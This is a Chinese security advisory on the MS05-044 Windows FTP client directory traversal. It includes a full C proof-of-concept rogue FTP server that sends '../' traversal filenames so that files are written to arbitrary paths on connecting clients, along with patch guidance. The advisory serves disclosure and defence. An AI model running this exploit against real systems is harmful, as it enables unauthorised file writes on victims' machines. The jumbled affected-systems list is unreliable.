安全研究
安全漏洞
Microsoft Windows FTP客户端目录遍历漏洞(MS05-044)
发布日期:2005-10-12
更新日期:2005-10-13
受影响系统:
Microsoft Windows XP SP1不受影响系统:
Microsoft Windows Server 2003
Microsoft Internet Explorer 6.0 SP1
- Microsoft Windows 2000 SP4
Microsoft Windows XP SP2描述:
Microsoft Windows Server 2003 SP1
Microsoft Windows Server 2003
Microsoft Windows ME
Microsoft Windows 98se
Microsoft Windows 98
Microsoft Windows 2000SP4
BUGTRAQ ID: 12160
CVE(CAN) ID: CVE-2005-2126
Microsoft Windows是微软发布的非常流行的操作系统。
Microsoft Windows的Internet Explorer捆绑了内嵌的FTP客户端。这个FTP客户端不能正确地验证从FTP服务器接收的文件名。如果客户端手动选择使用FTP传输文件的话,攻击者就可以修改文件传输的目标位置。此漏洞可能允许攻击者将文件写入位于受影响的系统上的任何文件系统。
<*来源:Albert Puigsech Galicia (ripe@7a69ezine.org)
链接:http://www.securiteam.com/windowsntfocus/5NP0615EKM.html
http://www.microsoft.com/technet/security/Bulletin/MS05-044.mspx
http://www.us-cert.gov/cas/techalerts/TA05-284A.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <errno.h>
#define MAX_BUF 1024
#define FTP_PORT 21
int main(int argc, char **argv) {
char ch;
char buffer[MAX_BUF + 1];
char ipbuf[MAX_BUF + 1];
char *local_file, *remote_file;
int sfdmain, sfdses, sfddata;
int readed;
int ip1,ip2,ip3,ip4,port1,port2;
int fd;
struct stat st;
struct sockaddr_in ftpmain = { AF_INET, htons(FTP_PORT), INADDR_ANY };
struct sockaddr_in ftpdata;
if (argc < 3) {
printf("\t7a69Adv#17 - Internet Explorer FTP download path disclosure prof of concept\n");
printf("Use:\n");
printf("\t%s <local_file> <remote_file>\n", argv[0]);
exit(0);
}
local_file = argv[1];
remote_file = argv[2];
if ((fd = open(local_file, O_RDONLY)) == -1) {
perror("open()");
exit(-1);
}
if ((sfdmain = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (bind(sfdmain, (struct sockaddr *)&ftpmain, sizeof(struct sockaddr)) == -1) {
perror("bind()");
exit(-1);
}
if (listen(sfdmain, 1) == -1) {
perror("listen()");
exit(-1);
}
if ((sfdses = accept(sfdmain, NULL, NULL)) == -1) {
perror("accept()");
exit(-1);
}
write(sfdses, "200 OK\r\n", 8);
while ((readed = read(sfdses, buffer, MAX_BUF)) > 0) {
buffer[readed] = 0;
printf(">> %s", buffer);
if (!strncmp(buffer, "noop", 4)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "USER ", 5)) write(sfdses, "331 OK\r\n", 8);
else if (!strncmp(buffer, "PASS ", 5)) write(sfdses, "230 OK\r\n", 8);
else if (!strncmp(buffer, "CWD ", 4)) write(sfdses, "250 OK\r\n", 8);
else if (!strncmp(buffer, "PWD", 3)) write(sfdses, "257 \"/\"\r\n", 9);
else if (!strncmp(buffer, "TYPE ", 5)) write(sfdses, "200 OK\r\n", 8);
else if (!strncmp(buffer, "PORT ", 5)) {
sscanf(&buffer[5], "%i,%i,%i,%i,%i,%i", &ip1, &ip2, &ip3, &ip4, &port1, &port2);
snprintf(ipbuf, MAX_BUF, "%i.%i.%i.%i", ip1, ip2, ip3, ip4);
ftpdata.sin_family = AF_INET;
ftpdata.sin_addr.s_addr = inet_addr(ipbuf);
ftpdata.sin_port = htons(port1*256+port2);
if ((sfddata = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
perror("socket()");
exit(-1);
}
if (connect(sfddata, (struct sockaddr *)&ftpdata, sizeof(struct sockaddr)) == -1) {
write(sfdses, "421 OK\r\n", 8);
} else {
write(sfdses, "220 OK\r\n", 8);
}
}
else if (!strncmp(buffer, "LIST", 4)) {
write(sfdses, "150 OK\r\n", 8);
snprintf(buffer, MAX_BUF, "-rwxrwxrwx 1 0 0 1 Dec 08 07:36 /../../../../../../../../../../..%s\r\n", remote_file);
write(sfddata, buffer, strlen(buffer));
close(sfddata);
write(sfdses, "226 OK\r\n", 8);
}
else if(!strncmp(buffer, "RETR ", 5)) {
write(sfdses, "150 OK\r\n", 8);
fstat(fd, &st);
while(st.st_size-- > 0) {
read(fd, &ch, 1);
write(sfddata, &ch, 1);
}
close(sfddata);
write(sfdses, "226 OK\r\n", 8);
}
else if (!strncmp(buffer, "QUIT", 4)) {
write(sfdses, "221 OK\r\n", 8);
close(sfdses); close(sfdmain); close(sfddata);
}
else
write(sfdses, "500 WTF\r\n", 9);
}
}
建议:
临时解决方法:
在边界防火墙阻断:
* 不要从不可信任的FTP服务器下载文件。
厂商补丁:
Microsoft
---------
Microsoft已经为此发布了一个安全公告(MS05-044)以及相应补丁:
MS05-044:Vulnerability in the Windows FTP Client Could Allow File Transfer Location Tampering (905495)
链接:http://www.microsoft.com/technet/security/Bulletin/MS05-044.mspx
浏览次数:4930
严重程度:0(网友投票)
绿盟科技给您安全的保障